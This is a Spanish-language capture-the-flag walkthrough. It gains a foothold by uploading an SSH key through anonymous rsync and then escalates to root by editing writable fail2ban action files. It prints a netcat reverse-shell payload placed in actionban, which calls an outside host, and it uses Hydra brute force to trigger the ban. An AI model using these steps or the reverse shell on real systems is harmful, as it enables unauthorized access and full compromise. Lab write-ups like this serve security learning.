MAQUINA FAIL (ENUM RSYNC 'PUERTO 873' + SSH- KEYGEN + PREVISEC 'GROUP FAIL2BAIN')
Last updated
Last updated
Realizo un escaneo de puertos con nmap para ver los puertos abiertos, los servicios y las versiones de estos.
El escaneo me encontró 2 puertos interesantes el 22 ssh y el 873 rsync.
Como no tengo credenciales dejo de lado el puerto 22 y me concentro en el puerto 873. Con nmap ejecute un script el cual me recopila un poco de información.
Este script me muestra que tengo un usuario llamado fox y al parecer estaría el directorio home.
Con el siguiente comando voy a poder listar de forma anónima el directorio donde se encuentra fox.
Puedo ver que tengo varias carpetas, ahora lo bueno que tiene rsync es que puedo descargarme o traerme estos archivos a mi directorio de trabajo con el siguiente comando.
Estos archivos no contenían nada interesante, luego de una busqueda tambien puedo realizar subida de archivos, asi que intente cargar un archivo.txt.
Ahora que subí con exito el mi archivo lo que hize fue realizar la subida de archivos de mi id_rsa publica para tener acceso como fox.
Lo primero fue crear mi id_rsa con ssh-keygen.
Luego cree una carpeta llamada .ssh en el directorio /tmp, seguido copie la id_rsa.publica al directorio /tmp.ssh pero como el nombre de authorized_keys.
A la carpeta /tmp/.ssh la subo completa a la maquina victima con el comando utilizado anteriormente.
Ya subido el archivo a través del ssh como usuario fox me logue y ya estoy dentro de la maquina como usuario fox.
Ya dentro voy a realice un reconocimiento de la maquina para ver a lo que me estoy enfrentando.
Como solo tengo un usuario aparte del root, voy a buscar la forma de escalar privilegios para acceder como usuario root.
En este caso probé utilizando sudo -l pero no hizo nada, luego busque permisos SUID encontrando lo siguiente.
Al verificar el ID me tope con un grupo interesante que tiene permisos de root '1000' llamado fail2ban.
Buscando en google encontré que puedo aprovechar unas malas configuraciones para poder realizar la escalada de privilegios.
Lo primero que hice fue buscar archivos que tenga permisos de lectura y me tope con varios archivos pertenecientes a ese grupo.
Luego voy al directorio donde están estos archivos y listo completo la carpeta observando que tengo permisos de escritura también en todos los archivos.
Como dije anteriormente encontré la forma de escalar privielegios abusando de unas malas configuraciones de estos archivos, para ello realizo lo siguiente.
# Copio **iptables-multiport.conf** al directorio de inicio del usuario actual. cp /etc/fail2ban/action.d/iptables-multiport.conf ~
# Ahora modifique el archivo. nano ~/iptables-multiport.conf
#Insertamos una carga útil de shell inverso en el **actionban**. actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash
#Luego, vuelva el archivo de configuración al original.
mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
Terminado de realizar estos pasos lo que hize fue utilizar hydra para realizar fuerza bruta al ssh.
Listo ahora somos root.